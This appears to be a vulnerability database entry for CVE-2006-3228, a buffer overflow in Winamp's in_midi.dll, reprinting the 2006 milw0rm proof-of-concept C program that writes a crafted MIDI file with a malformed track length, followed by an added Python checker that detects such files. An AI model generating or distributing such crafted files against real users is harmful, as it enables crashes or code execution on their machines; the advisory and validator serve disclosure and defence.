WinAmp in_midi.dll Buffer Overflow Vulnerability

Vulnerability ID: 1110494    Vulnerability type: Buffer overflow
Published: 2006-06-20    Updated: 2006-06-26
CVE number: CVE-2006-3228    CNNVD-ID: CNNVD-200606-496
Platform: Windows    CVSS score: 9.3
|Vulnerability sources
https://www.exploit-db.com/exploits/1935
https://www.securityfocus.com/bid/83787
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-496
|Vulnerability details
A buffer overflow exists in in_midi.dll of WinAmp versions 2.90 through 5.23 (including 5.21); a remote attacker can execute arbitrary code by means of a crafted .mid (MIDI) file.
|Exploit (PoC)
/*
 * ********************************************** *
 * Winamp 5.21 - Midi Buffer Overflow in_midi.dll *
 * ********************************************** *
 * PoC coded by: BassReFLeX                       *
 * Date: 19 Jun 2006                              *
 * ********************************************** *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

/* Standard MIDI File header chunk: "MThd", length 6, format 0, one track,
 * division 0x0060, followed by the start of an "MTrk" chunk whose length
 * field is left incomplete. */
char header[] = "\x4D\x54\x68\x64\x00\x00"
                "\x00\x06\x00\x00\x00\x01"
                "\x00\x60\x4D\x54\x72\x6B"
                "\x00\x00";

/* Filler bytes written after the incomplete track chunk header. */
char badc0de[] = "\xFF\xFF\xFF\xFF\xFF\xFF"
                 "\xFF\xFF\xFF\xFF\xFF\xFF";

int main(int argc, char* argv[])
{
    system("cls");   /* Windows console clear; the PoC targets Windows only */
    printf("\n* ********************************************** *");
    printf("\n* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *");
    printf("\n* ********************************************** *");
    printf("\n* PoC coded by: BassReFLeX                       *");
    printf("\n* Date: 19 Jun 2006                              *");
    printf("\n* ********************************************** *");

    if (argc != 2)
    {
        usage(argv[0]);
    }

    FILE *f;
    f = fopen(argv[1], "w");
    if (!f)
    {
        printf("\nFile couldn't open!");
        exit(1);
    }

    printf("\n\nWriting crafted .mid file...");
    /* sizeof() counts each array's terminating NUL, so one extra zero byte
     * is written after the header and after the filler. */
    fwrite(header, 1, sizeof(header), f);
    fwrite(badc0de, 1, sizeof(badc0de), f);
    fclose(f);
    printf("\nFile created successfully!");
    printf("\nFile: %s", argv[1]);
    return 0;
}

void usage(char* file)
{
    printf("\n\n");
    printf("\n%s <Filename>", file);
    printf("\n\nFilename = .mid crafted file. Example: winsploit.exe craftedsh1t.mid");
    exit(1);
}

// milw0rm.com [2006-06-20]
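The PoC above writes a MIDI file whose "MTrk" chunk declares far more data than the file actually contains: with the NUL terminators that sizeof() appends, the three zero bytes after "MTrk" and the first 0xFF filler byte form a length field of 255, while only 12 bytes follow it. A loader that trusts that length and copies or allocates accordingly is the class of defect this advisory describes. The following Python checker is an added editorial example, not code from the advisory, the PoC author or Winamp; it walks the MThd/MTrk chunk structure of a Standard MIDI File and rejects any chunk whose declared length exceeds the bytes remaining. The two sample inputs and the function names are constructed here.

```python
import struct

MTHD = b"MThd"
MTRK = b"MTrk"


def parse_midi_chunks(data: bytes):
    """Walk the chunk list of a Standard MIDI File.

    Returns a list of (chunk_id, declared_length, available_bytes, issue)
    tuples; issue is None for a chunk whose declared length fits in the file.
    Parsing stops at the first malformed chunk.
    """
    findings = []
    if len(data) < 14 or data[:4] != MTHD:
        return [(MTHD, None, len(data), "missing or truncated MThd header")]
    pos = 0
    while pos + 8 <= len(data):
        chunk_id = data[pos:pos + 4]
        (declared,) = struct.unpack(">I", data[pos + 4:pos + 8])  # big-endian length
        body_start = pos + 8
        available = len(data) - body_start
        issue = None
        if chunk_id not in (MTHD, MTRK):
            issue = "unknown chunk id"
        elif chunk_id == MTHD and declared != 6:
            issue = "MThd length must be 6"
        elif declared > available:
            # The length field is attacker-controlled; a reader that allocates
            # or copies `declared` bytes without this check overruns its buffer.
            issue = "declared length exceeds remaining bytes"
        findings.append((chunk_id, declared, available, issue))
        if issue is not None:
            break
        pos = body_start + declared
    else:
        # Loop ended without a break: anything left over is not a full chunk header.
        if pos != len(data):
            findings.append((data[pos:], None, len(data) - pos,
                             "trailing bytes after last chunk"))
    return findings


def is_well_formed(data: bytes) -> bool:
    """True only when every chunk's declared length is backed by real bytes."""
    return all(issue is None for _, _, _, issue in parse_midi_chunks(data))


# Constructed sample: minimal valid file, one track holding only an End-of-Track event.
VALID_MIDI = (MTHD + struct.pack(">IHHH", 6, 0, 1, 96)
              + MTRK + struct.pack(">I", 4) + b"\x00\xff\x2f\x00")

# Constructed sample with the same byte layout the PoC produces: the three zero
# bytes after "MTrk" plus the first 0xFF form a length of 255, but only 12 bytes follow.
POC_SHAPED_MIDI = (MTHD + b"\x00\x00\x00\x06\x00\x00\x00\x01\x00\x60"
                   + MTRK + b"\x00\x00\x00" + b"\xff" * 12 + b"\x00")

if __name__ == "__main__":
    for name, sample in (("valid", VALID_MIDI), ("poc-shaped", POC_SHAPED_MIDI)):
        verdict = "well-formed" if is_well_formed(sample) else "REJECT"
        print(name, verdict, parse_midi_chunks(sample))
```

The check that matters is the comparison of the declared chunk length against the bytes actually remaining; a parser should either reject the file at that point or clamp its reads to the remaining bytes, never size a buffer or a copy from the untrusted length alone.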
|Affected products
NullSoft Winamp 2.91
NullSoft Winamp 5.23
NullSoft Winamp 5.21
NullSoft Winamp 5.2
NullSoft Winamp 5.13
NullSoft Winamp 5.12
NullSoft Winamp 5.11
|References

Source: forums.winamp.com
Link: http://forums.winamp.com/showthread.php?threadid=248100
Source: www.winamp.com
Link: http://www.winamp.com/about/article.php?aid=10694
Source: MILW0RM
Name: 1935
Link: http://www.milw0rm.com/exploits/1935
Source: VIM
Name: 20060622Winampsecurityvagueness
Link: http://www.attrition.org/pipermail/vim/2006-June/000893.html
Source: VIM
Name: 20060622Winampsecurityvagueness
Link: http://www.attrition.org/pipermail/vim/2006-June/000892.html
Source: SECUNIA
Name: 20722
Link: http://secunia.com/advisories/20722
Source: MILW0RM
Name: 1935
Link: http://milw0rm.com/exploits/1935